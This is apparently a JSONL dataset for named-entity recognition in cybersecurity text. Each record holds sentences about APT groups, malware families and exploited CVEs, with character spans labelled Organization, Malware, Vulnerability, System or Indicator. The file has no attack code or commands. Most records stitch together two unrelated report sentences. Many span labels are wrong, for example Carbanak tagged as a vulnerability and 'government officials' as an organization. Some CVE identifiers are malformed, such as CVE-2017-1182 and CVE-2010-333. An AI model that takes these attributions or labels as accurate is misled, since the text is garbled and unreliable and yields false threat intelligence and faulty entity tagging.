{"text": "Anomali Researchers were able to identify multiple samples of malicious RTF documents ITW using the same exploit for CVE-2018-0798 . No zero-day vulnerabilities were used to breach targeted networks , instead \" TG-3390 relied on old vulnerabilities such as CVE-2011-3544 \" \u2014 a near-year-old Java security hole \u2014 \" and CVE-2010-0738 to compromise their targets \" , Dell SecureWorks' researchers reported .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 86, "end": 89, "label": "Malware"}, {"start": 117, "end": 130, "label": "Vulnerability"}, {"start": 136, "end": 144, "label": "Vulnerability"}, {"start": 257, "end": 270, "label": "Vulnerability"}, {"start": 318, "end": 331, "label": "Vulnerability"}, {"start": 364, "end": 381, "label": "Organization"}]}
{"text": "Upon opening of the MS Word document , our embedded file exploits CVE-2017-11882 to drop a malicious fake Norton Security Shell Extension module , 'NavShExt.dll' , which is then injected into iexplore.exe to install the backdoor , begin collection , and activate command and control . Execute a command through exploits for CVE-2017-11882 .", "spans": [{"start": 66, "end": 80, "label": "Vulnerability"}, {"start": 147, "end": 161, "label": "Malware"}, {"start": 192, "end": 204, "label": "Malware"}, {"start": 324, "end": 338, "label": "Vulnerability"}]}
{"text": "Moving through the infection process , NetWitness Endpoint detects the initial exploit CVE-2017-1182 in action as the Microsoft Equation Editor , EQNEDT32.exe , scores high for potentially malicious activity . Execute a command through exploits for CVE-2018-0802 .", "spans": [{"start": 87, "end": 100, "label": "Vulnerability"}, {"start": 118, "end": 143, "label": "Malware"}, {"start": 146, "end": 158, "label": "Malware"}, {"start": 249, "end": 262, "label": "Vulnerability"}]}
{"text": "In some of the latest samples of BalkanDoor detected in 2019 , the malware is distributed as an ACE archive , disguised as a RAR archive (i.e , not an executable file) , specially crafted to exploit the WinRAR ACE vulnerability CVE-2018-20250 . The document attached to this e-mail exploits CVE-2012-0158 .", "spans": [{"start": 33, "end": 43, "label": "Malware"}, {"start": 228, "end": 242, "label": "Vulnerability"}, {"start": 275, "end": 281, "label": "Vulnerability"}, {"start": 282, "end": 290, "label": "Vulnerability"}, {"start": 291, "end": 304, "label": "Vulnerability"}]}
{"text": "The China Chopper actor activity starts with the download and execution of two exploit files which attempt to exploit the Windows vulnerabilities CVE-2015-0062 , CVE-2015-1701 and CVE-2016-0099 to allow the attacker to modify other objects on the server . Tropic Trooper is also still exploiting CVE-2012-0158 , as are many threat actors .", "spans": [{"start": 4, "end": 17, "label": "Malware"}, {"start": 146, "end": 159, "label": "Vulnerability"}, {"start": 162, "end": 175, "label": "Vulnerability"}, {"start": 180, "end": 193, "label": "Vulnerability"}, {"start": 207, "end": 215, "label": "Organization"}, {"start": 256, "end": 270, "label": "Organization"}, {"start": 296, "end": 309, "label": "Vulnerability"}]}
{"text": "The following archive caught our attention for exploiting a WinRAR unacev2 module vulnerability and for having interesting content . The documents attached to spear-phishing e-mails used in both attacks contain code that exploits CVE-2012-0158 , which despite its age remains one of the most common Microsoft Word vulnerabilities being exploited by multiple threat actors .", "spans": [{"start": 14, "end": 21, "label": "Malware"}, {"start": 82, "end": 95, "label": "Vulnerability"}, {"start": 137, "end": 146, "label": "Indicator"}, {"start": 230, "end": 243, "label": "Vulnerability"}, {"start": 299, "end": 313, "label": "System"}, {"start": 314, "end": 329, "label": "Vulnerability"}]}
{"text": "In all emails sent to these government officials , the actor used the same attachment : a malicious Microsoft Word document that exploited the CVE-2012-0158 vulnerability to drop a malicious payload . the backdoor is packaged together with the CVE-2013-5065 EoP exploit and heavily obfuscated .", "spans": [{"start": 28, "end": 48, "label": "Organization"}, {"start": 90, "end": 123, "label": "Malware"}, {"start": 143, "end": 156, "label": "Vulnerability"}, {"start": 244, "end": 257, "label": "Vulnerability"}, {"start": 258, "end": 261, "label": "System"}, {"start": 262, "end": 269, "label": "Vulnerability"}]}
{"text": "According to the security firm , this campaign targeted Indian military officials via spear-phishing emails , distributing spyware to its victims via an Adobe Reader vulnerability . While we were unable to recover the initial vulnerability used , it is possibly the same CVE-2014-0515 Adobe Flash exploit first reported by Cisco TRAC in late July .", "spans": [{"start": 17, "end": 30, "label": "Organization"}, {"start": 63, "end": 81, "label": "Organization"}, {"start": 153, "end": 179, "label": "Vulnerability"}, {"start": 271, "end": 284, "label": "Vulnerability"}, {"start": 285, "end": 296, "label": "System"}, {"start": 297, "end": 304, "label": "Vulnerability"}, {"start": 323, "end": 333, "label": "Organization"}]}
{"text": "PLATINUM 's persistent use of spear phishing tactics ( phishing attempts aimed at specific individuals ) and access to previously undiscovered zero-day exploits have made it a highly resilient threat . However , to increase success rates APT20 can use zero-day exploits , so even a properly patched system would be compromised .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 82, "end": 102, "label": "Organization"}, {"start": 143, "end": 160, "label": "Vulnerability"}, {"start": 238, "end": 243, "label": "Organization"}, {"start": 252, "end": 260, "label": "Vulnerability"}]}
{"text": "The group 's persistent use of spear phishing tactics ( phishing attempts aimed at specific individuals ) and access to previously undiscovered zero-day exploits have made it a highly resilient threat . PLEAD also dabbled with a short-lived , fileless version of their malware when it obtained an exploit for a Flash vulnerability ( CVE-2015-5119 ) that was leaked during the Hacking Team breach .", "spans": [{"start": 4, "end": 9, "label": "Organization"}, {"start": 83, "end": 103, "label": "Organization"}, {"start": 144, "end": 161, "label": "Vulnerability"}, {"start": 297, "end": 304, "label": "Vulnerability"}, {"start": 311, "end": 316, "label": "System"}, {"start": 333, "end": 346, "label": "Vulnerability"}]}
{"text": "We believe that the Carbanak campaign is a clear indicator of a new era in cybercrime in which criminals use APT techniques directly against the financial industry instead of through its customers . PLEAD also uses CVE-2017-7269 , a buffer overflow vulnerability Microsoft Internet Information Services ( IIS ) 6.0 to compromise the victim 's server .", "spans": [{"start": 20, "end": 28, "label": "Vulnerability"}, {"start": 95, "end": 104, "label": "Organization"}, {"start": 145, "end": 163, "label": "Organization"}, {"start": 187, "end": 196, "label": "Organization"}, {"start": 215, "end": 228, "label": "Vulnerability"}, {"start": 263, "end": 272, "label": "Organization"}, {"start": 273, "end": 302, "label": "System"}, {"start": 305, "end": 308, "label": "System"}]}
{"text": "Carbanak has its origin in more common financial fraud including theft from consumer and corporate bank accounts in Europe and Russia , using standard banking malware , mainly Carberp . Kaspersky Lab has detected a new method of first infection that uses a drive-by-download with a flash exploit ( CVE-2015-5119 , the one leaked from The Hacking Team incident ) .", "spans": [{"start": 0, "end": 8, "label": "Vulnerability"}, {"start": 76, "end": 84, "label": "Organization"}, {"start": 176, "end": 183, "label": "System"}, {"start": 186, "end": 199, "label": "Organization"}, {"start": 282, "end": 287, "label": "System"}, {"start": 288, "end": 295, "label": "Vulnerability"}, {"start": 298, "end": 311, "label": "Vulnerability"}]}
{"text": "However , in September last year , our friends at CSIS published a blog detailing a new Carbanak variant affecting one of its customers . If the document was delivered with macros instead of exploits ( CVE-2012-0158 , CVE-2013-3906 or CVE-2014-1761 ) , then the document contained instructions for enabling macros .", "spans": [{"start": 50, "end": 54, "label": "Organization"}, {"start": 88, "end": 96, "label": "Vulnerability"}, {"start": 126, "end": 135, "label": "Organization"}, {"start": 202, "end": 215, "label": "Vulnerability"}, {"start": 218, "end": 231, "label": "Vulnerability"}, {"start": 235, "end": 248, "label": "Vulnerability"}]}
{"text": "PIVY also played a key role in the 2011 campaign known as Nitro that targeted chemical makers , government agencies , defense contractors , and human rights groups.10,11 Still active a year later , the Nitro attackers used a zero-day vulnerability in Java to deploy PIVY in 2012 . Moreover , they used the same exploit kit Niteris as that in the Corkow case .", "spans": [{"start": 0, "end": 4, "label": "System"}, {"start": 78, "end": 93, "label": "Organization"}, {"start": 96, "end": 115, "label": "Organization"}, {"start": 118, "end": 137, "label": "Organization"}, {"start": 208, "end": 217, "label": "Organization"}, {"start": 225, "end": 247, "label": "Vulnerability"}, {"start": 266, "end": 270, "label": "System"}, {"start": 311, "end": 318, "label": "Vulnerability"}, {"start": 319, "end": 330, "label": "Vulnerability"}, {"start": 346, "end": 352, "label": "Malware"}]}
{"text": "We believe that the Carbanak campaign is a clear indicator of a new era in cybercrime in which criminals use APT techniques directly against the financial industry instead of through its customers . The CVE-2012-0773 was originally discovered by VUPEN and has an interesting story .", "spans": [{"start": 20, "end": 28, "label": "Vulnerability"}, {"start": 95, "end": 104, "label": "Organization"}, {"start": 145, "end": 163, "label": "Organization"}, {"start": 187, "end": 196, "label": "Organization"}, {"start": 203, "end": 216, "label": "Vulnerability"}]}
{"text": "Carbanak has its origin in more common financial fraud including theft from consumer and corporate bank accounts in Europe and Russia , using standard banking malware , mainly Carberp . The decoy documents used by the InPage exploits suggest that the targets are likely to be politically or militarily motivated .", "spans": [{"start": 0, "end": 8, "label": "Vulnerability"}, {"start": 76, "end": 84, "label": "Organization"}, {"start": 176, "end": 183, "label": "System"}, {"start": 190, "end": 205, "label": "Malware"}, {"start": 218, "end": 224, "label": "System"}, {"start": 225, "end": 233, "label": "Vulnerability"}, {"start": 276, "end": 287, "label": "Organization"}, {"start": 291, "end": 301, "label": "Organization"}]}
{"text": "However , in September last year , our friends at CSIS published a blog detailing a new Carbanak variant affecting one of its customers . While documents designed to exploit the InPage software are rare , they are not new \u2013 however in recent weeks Unit42 has observed numerous InPage exploits leveraging similar shellcode , suggesting continued use of the exploit previously discussed by Kaspersky .", "spans": [{"start": 50, "end": 54, "label": "Organization"}, {"start": 88, "end": 96, "label": "Vulnerability"}, {"start": 126, "end": 135, "label": "Organization"}, {"start": 166, "end": 173, "label": "Vulnerability"}, {"start": 178, "end": 193, "label": "Malware"}, {"start": 248, "end": 254, "label": "Organization"}, {"start": 277, "end": 283, "label": "System"}, {"start": 284, "end": 292, "label": "Vulnerability"}, {"start": 356, "end": 363, "label": "Vulnerability"}, {"start": 388, "end": 397, "label": "Organization"}]}
{"text": "Alternatively , it is also possible that APT41 injected malicious code into the package prior to compilation , circumventing the need to steal the code-signing certificate and compile it on their own . Compared to Patchwork , whose Trojanized documents exploit at least five security flaws , Confucius' backdoors are delivered through Office files exploiting memory corruption vulnerabilities CVE-2015-1641 and CVE-2017-11882 .", "spans": [{"start": 41, "end": 46, "label": "Organization"}, {"start": 214, "end": 223, "label": "Organization"}, {"start": 253, "end": 260, "label": "Vulnerability"}, {"start": 393, "end": 406, "label": "Vulnerability"}, {"start": 411, "end": 425, "label": "Vulnerability"}]}
{"text": "In these instances , APT41 leveraged TeamViewer to transfer malware into the compromised environment , although we do not have direct evidence of APT41 compromising TeamViewer . Lately , Patchwork has been sending multiple RTF files exploiting CVE-2017-8570 .", "spans": [{"start": 21, "end": 26, "label": "Organization"}, {"start": 37, "end": 47, "label": "System"}, {"start": 146, "end": 151, "label": "Organization"}, {"start": 187, "end": 196, "label": "Organization"}, {"start": 223, "end": 232, "label": "Indicator"}, {"start": 244, "end": 257, "label": "Vulnerability"}]}
{"text": "APT41 has targeted payment services specializing in handling in-game transactions and real money transfer (RMT) purchases . Confucius' backdoors are delivered through Office documents exploiting memory corruption vulnerabilities CVE-2015-1641 and CVE-2017-11882 .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 19, "end": 35, "label": "Organization"}, {"start": 124, "end": 144, "label": "Malware"}, {"start": 229, "end": 242, "label": "Vulnerability"}, {"start": 247, "end": 261, "label": "Vulnerability"}]}
{"text": "In some instances , APT41 leveraged POISONPLUG as a first-stage backdoor to deploy the HIGHNOON backdoor in the targeted environment . The sctrls backdoor we came across is delivered via RTF files exploiting CVE-2015-1641 .", "spans": [{"start": 20, "end": 25, "label": "Organization"}, {"start": 36, "end": 46, "label": "System"}, {"start": 87, "end": 95, "label": "System"}, {"start": 139, "end": 154, "label": "Malware"}, {"start": 208, "end": 221, "label": "Vulnerability"}]}
{"text": "In another instance , APT41 targeted a hotel\u2019s reservation systems ahead of Chinese officials staying there , suggesting the group was tasked to reconnoiter the facility for security reasons . The documents that exploit CVE-2017-11882 download another payload \u2014 an HTML Application ( HTA ) file toting a malicious Visual Basic ( VBS ) script \u2014 from the server , which is executed accordingly by the command-line tool mshta.exe .", "spans": [{"start": 22, "end": 27, "label": "Organization"}, {"start": 212, "end": 219, "label": "Vulnerability"}, {"start": 220, "end": 234, "label": "Vulnerability"}, {"start": 265, "end": 281, "label": "System"}, {"start": 284, "end": 287, "label": "System"}, {"start": 314, "end": 326, "label": "System"}, {"start": 329, "end": 332, "label": "System"}, {"start": 417, "end": 426, "label": "Indicator"}]}
{"text": "The limited use of these tools by APT41 suggests the group reserves more advanced TTPs and malware only for high-value targets . Hackers use the exploits \" Nitris Exploit Kit \" ( earlier known as CottonCastle ) , which is not available in open sources and sold only to trusted users .", "spans": [{"start": 34, "end": 39, "label": "Organization"}, {"start": 156, "end": 174, "label": "Vulnerability"}, {"start": 196, "end": 208, "label": "Vulnerability"}]}
{"text": "At the time of analysis , the subdomains did not host a website; however , based on BITTER APT group\u2019s targeting patterns , it is highly likely that they were created to host faux login phishing pages designed to steal user\u2019s credentials . Hackers first actively spread bots using the Niteris exploit , and then search for infected devices at banks amongst their bots by analyzing IP addresses , cracked passwords and results of the modules performance .", "spans": [{"start": 84, "end": 94, "label": "Organization"}, {"start": 285, "end": 292, "label": "System"}, {"start": 293, "end": 300, "label": "Vulnerability"}, {"start": 343, "end": 348, "label": "Organization"}, {"start": 381, "end": 383, "label": "Indicator"}]}
{"text": "The group behind these attacks has stolen gigabytes of confidential documents , mostly from military organizations . In August 2014 , some of our users observed targeted attacks with a variation of CVE-2012-0158 and an unusual set of malware .", "spans": [{"start": 4, "end": 9, "label": "Organization"}, {"start": 92, "end": 100, "label": "Organization"}, {"start": 101, "end": 114, "label": "Organization"}, {"start": 198, "end": 211, "label": "Vulnerability"}]}
{"text": "They seem to have specialized knowledge about military operations , as they are focused on stealing specific files such as those that describe navigation routes . Longhorn , which we internally refer to as \" The Lamberts \" , first came to the attention of the ITSec community in 2014 , when our colleagues from FireEye discovered an attack using a zero day vulnerability ( CVE-2014-4148 ) .", "spans": [{"start": 0, "end": 4, "label": "Organization"}, {"start": 46, "end": 54, "label": "Organization"}, {"start": 208, "end": 220, "label": "Organization"}, {"start": 260, "end": 275, "label": "Organization"}, {"start": 311, "end": 318, "label": "Organization"}, {"start": 348, "end": 356, "label": "Vulnerability"}, {"start": 357, "end": 370, "label": "Vulnerability"}, {"start": 373, "end": 386, "label": "Vulnerability"}]}
{"text": "SectorJ04 used the spear phishing email to spread malicious Excel or malicious Word files , and downloaded the MSI files from the attacker\u2019s server when the malicious documents were run . The first time the Lambert family malware was uncovered publicly was in October 2014 , when FireEye posted a blog about a zero day exploit ( CVE-2014-4148 ) used in the wild .", "spans": [{"start": 0, "end": 9, "label": "Organization"}, {"start": 130, "end": 140, "label": "Organization"}, {"start": 207, "end": 229, "label": "Malware"}, {"start": 280, "end": 287, "label": "Organization"}, {"start": 310, "end": 318, "label": "Vulnerability"}, {"start": 319, "end": 326, "label": "Vulnerability"}, {"start": 329, "end": 342, "label": "Vulnerability"}]}
{"text": "Group-IB specialists have established that the aim of the attack was to deliver and launch the second stage of Silence\u2019s Trojan , known as Silence.MainModule . While in most cases the infection vector remains unknown , the high profile attack from 2014 used a very complex Windows TTF zero-day exploit ( CVE-2014-4148 ) .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 111, "end": 120, "label": "Organization"}, {"start": 273, "end": 280, "label": "System"}, {"start": 285, "end": 293, "label": "Vulnerability"}, {"start": 294, "end": 301, "label": "Vulnerability"}, {"start": 304, "end": 317, "label": "Vulnerability"}]}
{"text": "The hackers will map a company\u2019s network and look for strategically favorable locations for placing their malware . To further exemplify the proficiency of the attackers leveraging the Lamberts toolkit , deployment of Black Lambert included a rather sophisticated TTF zero day exploit , CVE-2014-4148 .", "spans": [{"start": 4, "end": 11, "label": "Organization"}, {"start": 185, "end": 201, "label": "Malware"}, {"start": 218, "end": 231, "label": "Malware"}, {"start": 268, "end": 276, "label": "Vulnerability"}, {"start": 277, "end": 284, "label": "Vulnerability"}, {"start": 287, "end": 300, "label": "Vulnerability"}]}
{"text": "Typically , APT10 tends to employ a namesquatting scheme in their domains that aims to confuse the observer by posing as a legitimate domain . This sample was also found to be deployed using the CVE-2012-0158 vulnerability .", "spans": [{"start": 12, "end": 17, "label": "Organization"}, {"start": 195, "end": 208, "label": "Vulnerability"}]}
{"text": "If the attack had succeeded , it would have given hackers control over the ATM network , while money mules would have been standing by the ATM machines at pre-set time intervals to cash them out . Our analysis shows that actors attempted to exploit CVE-2012-0158 to install NetTraveler Trojan .", "spans": [{"start": 50, "end": 57, "label": "Organization"}, {"start": 241, "end": 248, "label": "Vulnerability"}, {"start": 249, "end": 262, "label": "Vulnerability"}, {"start": 274, "end": 292, "label": "Malware"}]}
{"text": "Based on the functionality of the various tools uploaded to the webshells , we believe the threat actors breach the SharePoint servers to use as a beachhead , then attempt to move laterally across the network via stolen credentials and exploiting vulnerabilities . Unit 42 's analysis shows that NetTraveler attempted to exploit CVE-2012-0158 to install NetTraveler Trojan .", "spans": [{"start": 91, "end": 104, "label": "Organization"}, {"start": 265, "end": 272, "label": "Organization"}, {"start": 296, "end": 307, "label": "Malware"}, {"start": 321, "end": 328, "label": "Vulnerability"}, {"start": 329, "end": 342, "label": "Vulnerability"}, {"start": 354, "end": 372, "label": "Malware"}]}
{"text": "The first of them is the well-known FIN7 , which specializes in attacking various companies to get access to financial data or PoS infrastructure . Our analysis shows that NetTraveler attempted to exploit CVE-2012-0158 to install NetTraveler Trojan .", "spans": [{"start": 36, "end": 40, "label": "Organization"}, {"start": 74, "end": 91, "label": "Organization"}, {"start": 109, "end": 118, "label": "Organization"}, {"start": 172, "end": 183, "label": "Malware"}, {"start": 197, "end": 204, "label": "Vulnerability"}, {"start": 205, "end": 218, "label": "Vulnerability"}, {"start": 230, "end": 248, "label": "Malware"}]}
{"text": "Alpha\u2019s early role was fairly simple: engage with individuals , who he chose based on the goods they were selling , and then provide personal shipping addresses back to Omega . In this report , we'll review how the actors attempted to exploit CVE-2012-0158 to install the NetTraveler Trojan .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 235, "end": 242, "label": "Vulnerability"}, {"start": 243, "end": 256, "label": "Vulnerability"}, {"start": 272, "end": 290, "label": "Malware"}]}
{"text": "Instead of using fake Google Docs phishing pages to collect personal email login credentials , Scattered Canary began using phishing pages of commonly used business applications to compromise enterprise credentials . In this report , we'll review how NetTraveler attempted to exploit CVE-2012-0158 to install the NetTraveler Trojan .", "spans": [{"start": 95, "end": 111, "label": "Organization"}, {"start": 251, "end": 262, "label": "Malware"}, {"start": 276, "end": 283, "label": "Vulnerability"}, {"start": 284, "end": 297, "label": "Vulnerability"}, {"start": 313, "end": 331, "label": "Malware"}]}
{"text": "In some samples deployed since March 2019 , Turla developers modified their PowerShell scripts in order to bypass the Antimalware Scan Interface (AMSI) . In this report , we'll review how the NetTraveler attempted to exploit CVE-2012-0158 to install the NetTraveler Trojan .", "spans": [{"start": 44, "end": 49, "label": "Organization"}, {"start": 192, "end": 203, "label": "Malware"}, {"start": 217, "end": 224, "label": "Vulnerability"}, {"start": 225, "end": 238, "label": "Vulnerability"}, {"start": 254, "end": 272, "label": "Malware"}]}
{"text": "Distinct changes to Azazel by the Winnti developers include the addition of a function named \u2018Decrypt2\u2019 , which is used to decode an embedded configuration similar to the core implant . Kaspersky Lab 's products detect the Microsoft Office exploits used in the spear-phishing attacks , including Exploit.MSWord.CVE-2010-333 , Exploit.Win32.CVE-2012-0158 .", "spans": [{"start": 20, "end": 26, "label": "System"}, {"start": 34, "end": 51, "label": "Organization"}, {"start": 186, "end": 199, "label": "Organization"}, {"start": 223, "end": 239, "label": "Organization"}, {"start": 240, "end": 248, "label": "Vulnerability"}, {"start": 296, "end": 323, "label": "Indicator"}, {"start": 326, "end": 353, "label": "Indicator"}]}
{"text": "Early in Q2 , Kaspersky identified an interesting Lazarus attack targeting a mobile gaming company in South Korea that we believe was aimed at stealing application source code . The files exploit the well-known Microsoft Office vulnerability , CVE-2012-0158 , to execute malicious code in order to take control of the targeted systems .", "spans": [{"start": 14, "end": 23, "label": "Organization"}, {"start": 50, "end": 57, "label": "Organization"}, {"start": 77, "end": 90, "label": "Organization"}, {"start": 182, "end": 187, "label": "Indicator"}, {"start": 188, "end": 195, "label": "Vulnerability"}, {"start": 211, "end": 227, "label": "System"}, {"start": 244, "end": 257, "label": "Vulnerability"}]}
{"text": "APT19 leveraged Rich Text Format (RTF) and macro-enabled Microsoft Excel files to deliver their initial exploits . Earlier this month , Securelist 's technology caught another zero-day exploits deployed in targeted attacks .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 57, "end": 78, "label": "Malware"}, {"start": 136, "end": 146, "label": "Organization"}, {"start": 176, "end": 184, "label": "Vulnerability"}]}
{"text": "Most of these data-stealing capabilities were present in the oldest variants of CARBANAK that we have seen and some were added over time . Operation Daybreak appears to have been launched by ScarCruft in March 2016 and employs a previously unknown ( 0-day ) Adobe Flash Player exploit .", "spans": [{"start": 80, "end": 88, "label": "Malware"}, {"start": 250, "end": 255, "label": "Vulnerability"}, {"start": 258, "end": 276, "label": "System"}, {"start": 277, "end": 284, "label": "Vulnerability"}]}
{"text": "We have also observed them using virtual private network services that use IPs based in numerous countries to ensure anonymity and obfuscate criminal operations . Adobe Flash Player exploit .", "spans": [{"start": 22, "end": 26, "label": "Malware"}, {"start": 27, "end": 65, "label": "Malware"}, {"start": 163, "end": 181, "label": "System"}, {"start": 182, "end": 189, "label": "Vulnerability"}]}
{"text": "Once downloaded and executed , it drops an intermediate payload that further downloads a Pony DLL and Vawtrak executable , which perform data theft and connect to a command and control (C2) server . It is also possible that ScarCruft deployed another zero day exploit , CVE-2016-0147 , which was patched in April .", "spans": [{"start": 89, "end": 97, "label": "Malware"}, {"start": 102, "end": 109, "label": "Malware"}, {"start": 137, "end": 147, "label": "Malware"}, {"start": 152, "end": 159, "label": "Malware"}, {"start": 224, "end": 233, "label": "Organization"}, {"start": 251, "end": 259, "label": "Vulnerability"}, {"start": 260, "end": 267, "label": "Vulnerability"}, {"start": 270, "end": 283, "label": "Vulnerability"}]}
{"text": "After the executable is executed , it downloads Pony and Vawtrak malware variants to steal data . Operation Erebus leverages another Flash Player exploit ( CVE-2016-4117 ) through the use of watering hole attacks .", "spans": [{"start": 48, "end": 52, "label": "Malware"}, {"start": 57, "end": 64, "label": "Malware"}, {"start": 133, "end": 145, "label": "System"}, {"start": 146, "end": 153, "label": "Vulnerability"}, {"start": 156, "end": 169, "label": "Vulnerability"}]}
{"text": "Ploutus-D will load KXCashDispenserLib\u201d library implemented by Kalignite Platform (K3A.Platform.dll) to interact with the XFS Manager and control the Dispenser (see Figure 13) . ScarCruft 's Operation Erebus leverages another Flash Player exploit ( CVE-2016-4117 ) through the use of watering hole attacks .", "spans": [{"start": 0, "end": 9, "label": "Malware"}, {"start": 82, "end": 100, "label": "Malware"}, {"start": 178, "end": 187, "label": "Organization"}, {"start": 226, "end": 238, "label": "System"}, {"start": 239, "end": 246, "label": "Vulnerability"}, {"start": 249, "end": 262, "label": "Vulnerability"}]}
{"text": "DarkPulsar is a very interesting administrative module for controlling a passive backdoor named ' sipauth32.tsp ' that provides remote control , belonging to this category . Nevertheless , resourceful threat actors such as ScarCruft will probably continue to deploy zero-day exploits against their high profile targets .", "spans": [{"start": 0, "end": 10, "label": "System"}, {"start": 81, "end": 89, "label": "System"}, {"start": 98, "end": 111, "label": "Malware"}, {"start": 223, "end": 232, "label": "Organization"}, {"start": 266, "end": 274, "label": "Vulnerability"}]}
{"text": "During a recent campaign , APT32 leveraged social engineering emails with Microsoft ActiveMime file attachments to deliver malicious macros . This malware uses the public privilege escalation exploit code CVE-2018-8120 or UACME which is normally used by legitimate red teams .", "spans": [{"start": 27, "end": 32, "label": "Organization"}, {"start": 74, "end": 99, "label": "Malware"}, {"start": 192, "end": 199, "label": "Vulnerability"}, {"start": 205, "end": 218, "label": "Vulnerability"}, {"start": 222, "end": 227, "label": "Malware"}]}
{"text": "The group uses legitimate administration tools to fly under the radar in their post-exploitation phase , which makes detection of malicious activity , as well as attribution more complicated . Earlier this month , we caught another zero-day Adobe Flash Player exploits deployed in targeted attacks .", "spans": [{"start": 4, "end": 9, "label": "Organization"}, {"start": 15, "end": 46, "label": "System"}, {"start": 232, "end": 240, "label": "Vulnerability"}, {"start": 241, "end": 259, "label": "System"}]}
{"text": "PittyTiger has also been seen using Heartbleed vulnerability in order to directly get valid credentials . The other one , ScarCruft 's Operation Erebus employs an older exploit , for CVE-2016-4117 and leverages watering holes .", "spans": [{"start": 0, "end": 10, "label": "Organization"}, {"start": 36, "end": 60, "label": "Vulnerability"}, {"start": 169, "end": 176, "label": "Vulnerability"}, {"start": 183, "end": 196, "label": "Vulnerability"}]}
{"text": "They have also been seen using Heartbleed vulnerability in order to directly get valid credentials . The other one , \" Operation Erebus \" employs an older exploit , for CVE-2016-4117 and leverages watering holes .", "spans": [{"start": 31, "end": 55, "label": "Vulnerability"}, {"start": 155, "end": 162, "label": "Vulnerability"}, {"start": 169, "end": 182, "label": "Vulnerability"}]}
{"text": "Tactic #1: Delivering the miner directly to a vulnerable serverSome tactics we've observed involve exploiting CVE-2017-10271 , leveraging PowerShell to download the miner directly onto the victim\u2019s system (Figure 1) , and executing it using ShellExecute() . The ScarCruft APT gang has made use of a Flash zero day patched Thursday by Adobe to attack more than two dozen high-profile targets in Russia and Asia primarily .", "spans": [{"start": 110, "end": 124, "label": "Vulnerability"}, {"start": 138, "end": 148, "label": "System"}, {"start": 299, "end": 304, "label": "System"}, {"start": 305, "end": 313, "label": "Vulnerability"}]}
{"text": "APT28 is using novel techniques involving the EternalBlue exploit and the open source tool Responder to spread laterally through networks and likely target travelers . Adobe on Thursday patched a zero-day vulnerability in Flash Player that has been used in targeted attacks carried out by a new APT group operating primarily against high-profile victims in Russia and Asia .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 46, "end": 65, "label": "Vulnerability"}, {"start": 74, "end": 90, "label": "System"}, {"start": 91, "end": 100, "label": "System"}, {"start": 196, "end": 204, "label": "Vulnerability"}, {"start": 222, "end": 227, "label": "System"}]}
{"text": "Carbanak is a remote backdoor ( initially based on Carberp ) , designed for espionage , data exfiltration and to provide remote access to infected machines . Researchers at Kaspersky Lab privately disclosed the flaw to Adobe after exploits against the zero-day were used in March by the ScarCruft APT gang in what Kaspersky Lab is calling Operation Daybreak .", "spans": [{"start": 0, "end": 8, "label": "Vulnerability"}, {"start": 51, "end": 58, "label": "System"}, {"start": 76, "end": 85, "label": "Organization"}, {"start": 173, "end": 186, "label": "Organization"}, {"start": 252, "end": 260, "label": "Vulnerability"}, {"start": 314, "end": 327, "label": "Organization"}]}
{"text": "If found on the target system , Carbanak will try to exploit a known vulnerability in Windows XP , Windows Server 2003 , Windows Vista , Windows Server 2008 , Windows 7 , Windows 8 , and Windows Server 2012 , CVE-2013-3660 , for local privilege escalation . Kaspersky speculates that ScarCruft could also be behind another zero-day , CVE-2016-0147 , a vulnerability in Microsoft XML Core Services that was patched in April .", "spans": [{"start": 32, "end": 40, "label": "Vulnerability"}, {"start": 209, "end": 222, "label": "Vulnerability"}, {"start": 258, "end": 267, "label": "Organization"}, {"start": 284, "end": 293, "label": "Organization"}, {"start": 323, "end": 331, "label": "Vulnerability"}, {"start": 334, "end": 347, "label": "Vulnerability"}, {"start": 369, "end": 378, "label": "Organization"}, {"start": 379, "end": 382, "label": "System"}]}
{"text": "To enable connections to the infected computer using the Remote Desktop Protocol ( RDP ) , Carbanak sets Termservice service execution mode to Auto . Another set of attacks called Operation Erebus leverages another flash exploit , CVE-2016-4117 , and relies on watering hole attacks as a means of propagation .", "spans": [{"start": 57, "end": 80, "label": "System"}, {"start": 83, "end": 86, "label": "System"}, {"start": 91, "end": 99, "label": "Vulnerability"}, {"start": 215, "end": 220, "label": "System"}, {"start": 221, "end": 228, "label": "Vulnerability"}, {"start": 231, "end": 244, "label": "Vulnerability"}]}
{"text": "Just a few months later , in February 2015 , we announced the discovery of Carbanak , a cyber-criminal gang that used custom malware and APT techniques to steal millions of dollars while infecting hundreds of financial institutions in at least 30 countries . Thursday 's Flash Player update patched 36 vulnerabilities in total including the zero day CVE-2016-4171 .", "spans": [{"start": 75, "end": 83, "label": "Vulnerability"}, {"start": 88, "end": 107, "label": "Organization"}, {"start": 209, "end": 231, "label": "Organization"}, {"start": 271, "end": 276, "label": "System"}, {"start": 341, "end": 349, "label": "Vulnerability"}, {"start": 350, "end": 363, "label": "Vulnerability"}]}
{"text": "Dubbed \u2018Operation Sheep\u2019 , this massive data stealing campaign is the first known campaign seen in the wild to exploit the Man-in-the-Disk vulnerability revealed by Check Point Research earlier last year . Wild Neutron 's attacks in 2015 uses a stolen code signing certificate belonging to Taiwanese electronics maker Acer and an unknown Flash Player exploit .", "spans": [{"start": 7, "end": 24, "label": "Organization"}, {"start": 123, "end": 138, "label": "Vulnerability"}, {"start": 206, "end": 218, "label": "Organization"}, {"start": 245, "end": 276, "label": "Malware"}, {"start": 300, "end": 311, "label": "Organization"}, {"start": 338, "end": 350, "label": "System"}, {"start": 351, "end": 358, "label": "Vulnerability"}]}
